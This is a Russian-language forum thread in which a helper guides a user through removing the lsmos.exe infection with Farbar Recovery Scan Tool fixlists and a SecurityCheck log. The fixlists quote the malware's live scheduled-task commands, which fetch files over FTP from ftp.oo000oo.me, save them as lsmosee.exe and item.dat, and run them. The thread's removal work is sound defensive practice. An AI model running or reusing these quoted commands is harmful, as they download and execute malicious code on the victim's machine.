Вирус lsmos.exe

[Rusimba]

Здравствуйте!
Комп начал очень сильно тупить, в диспетчере обнаружил процесс lsmos.exe, в планировщике висит Mysa1, Mysa2, Mysa3 и ok. Прочитал что это вирус. Завершаешь этот процесс и все работает нормально. В интернете рекомендаций не много по лечению, все что делал
не помогает, после перезагрузки все снова появляется. Вот вся пачка болячек которые обнаружил:
lsmosee  (C:\Windows\Help\lsmosee.exe) - был удален после проверки Kaspersky Virus Removal Tool;
Mysa 1   (C:\Windows\System32\Tasks\Mysa1)
Mysa 2   (C:\Windows\System32\Tasks\Mysa2)
Mysa 3   (C:\Windows\System32\Tasks\Mysa3)
ok       (C:\Windows\System32\Tasks\ok)
lsmos    (C:\Windows\System32\lsmos.exe)

Помогите пожалуйста вылечить!

CollectionLog-2017.11.16-20.32.zip

[thyrex]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

• Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).

6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.

[Rusimba]

Сделал.

FRST-Addition.7z

[thyrex]

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
2017-11-16 14:52 - 2017-11-16 14:52 - 007052800 _____ C:\Windows\system32\lsmos.exe
AlternateDataStreams: C:\ProgramData\TEMP:41ADDB8A [152]
AlternateDataStreams: C:\ProgramData\TEMP:A064CECC [144]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:41ADDB8A [152]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:A064CECC [144]
Task: {E6B8DE63-64F7-496A-A07C-E88A74080CAF} - System32\Tasks\Mysa3 => cmd /c echo open ftp.oo000oo.me>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
c:\windows\help\lsmosee.exe
Task: {BB57992A-E50B-448A-92D3-617CF831BCED} - System32\Tasks\Mysa2 => cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
c:\windows\debug\item.dat
Task: {E74DDD5D-25CE-4ABF-9B93-8799ABD66E13} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Reboot:

2. Нажмите Файл – Сохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файла – Все файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание, что будет выполнена перезагрузка компьютера.

[Rusimba]

Готово.

После перезагрузки:

lsmos.exe в процессах нет. 

lsmosee  (C:\Windows\Help\lsmosee.exe) - нет
Mysa 1   (C:\Windows\System32\Tasks\Mysa1) - нет
Mysa 2   (C:\Windows\System32\Tasks\Mysa2) - нет
Mysa 3   (C:\Windows\System32\Tasks\Mysa3) - нет
ok       (C:\Windows\System32\Tasks\ok) - остался!
lsmos    (C:\Windows\System32\lsmos.exe) - нет

 

Fixlog.txt

[thyrex]

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
Task: {D06961F2-B3D2-445F-A85C-B190E584E8F3} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
c:\windows\debug\ok.dat
Reboot:

2. Нажмите Файл – Сохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файла – Все файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание, что будет выполнена перезагрузка компьютера.

[Rusimba]

Ну вроде все чисто Спасибо!

Подскажите, необходимо сделать что-либо еще дополнительно?

Fixlog.txt

[thyrex]

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
• Процитируйте содержимое файла в своем следующем сообщении.

[Rusimba]

SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17]
WebSite: www.safezone.cc
DateLog: 16.11.2017 23:24:23
Path starting: C:\Users\zimba\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
Log directory: C:\SecurityCheck\
IsAdmin: True
User: zimba
VersionXML: 4.75is-13.11.2017
___________________________________________________________________________

Windows 7(6.1.7601) Service Pack 1 (x86) Professional Lang: Russian(0419)
Дата установки ОС: 23.01.2017 12:26:02
Статус лицензии: Windows® 7, Professional edition Постоянная активация прошла успешно.
Режим загрузки: Normal
Браузер по умолчанию: D:\Программы\Firefox\firefox.exe
Системный диск: C: ФС: [NTFS] Емкость: [100.4 Гб] Занято: [39.8 Гб] Свободно: [60.6 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.0.9600.18837 [+]
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Загружать автоматически обновления и устанавливать по заданному расписанию
Дата установки обновлений: 2017-11-16 18:17:24
Центр обновления Windows (wuauserv) - Служба работает
Центр обеспечения безопасности (wscsvc) - Служба работает
Удаленный реестр (RemoteRegistry) - Служба остановлена
Обнаружение SSDP (SSDPSRV) - Служба работает
Службы удаленных рабочих столов (TermService) - Служба остановлена
Служба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена
------------------------------ [ MS Office ] ------------------------------
Microsoft Office 2010 x86 v.14.0.7015.1000
--------------------------- [ FirewallWindows ] ---------------------------
Брандмауэр Windows (MpsSvc) - Служба работает
--------------------------- [ AntiSpyware_WMI ] ---------------------------
Windows Defender (включен и обновлен)
--------------------------- [ OtherUtilities ] ----------------------------
7-Zip 16.04 v.16.04
TeamViewer 12 v.12.0.83369 Внимание! Скачать обновления
TeamViewer 12 (TeamViewer) - Служба работает
--------------------------------- [ IM ] ----------------------------------
Skype™ 7.31 v.7.31.104 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent 3.4.9 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
--------------------------- [ AppleProduction ] ---------------------------
iTunes v.12.6.1.25 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
Bonjour v.3.1.0.1
Служба Bonjour (Bonjour Service) - Служба остановлена
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Flash Player 27 ActiveX v.27.0.0.183
Adobe Flash Player 27 NPAPI v.27.0.0.183
Adobe Flash Player 27 PPAPI v.27.0.0.183
Adobe Acrobat Reader DC - Russian v.18.009.20044 [+]
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 57.0 (x86 ru) v.57.0 [+]
--------------------------- [ RunningProcess ] ----------------------------
D:\Программы\Firefox\firefox.exe v.57.0.0.6525
------------------ [ AntivirusFirewallProcessServices ] -------------------
Защитник Windows (WinDefend) - Служба работает
----------------------------- [ End of Log ] ------------------------------
 

[thyrex]

Выполните рекомендованное и на этом закончим

[Rusimba]

Большое спасибо!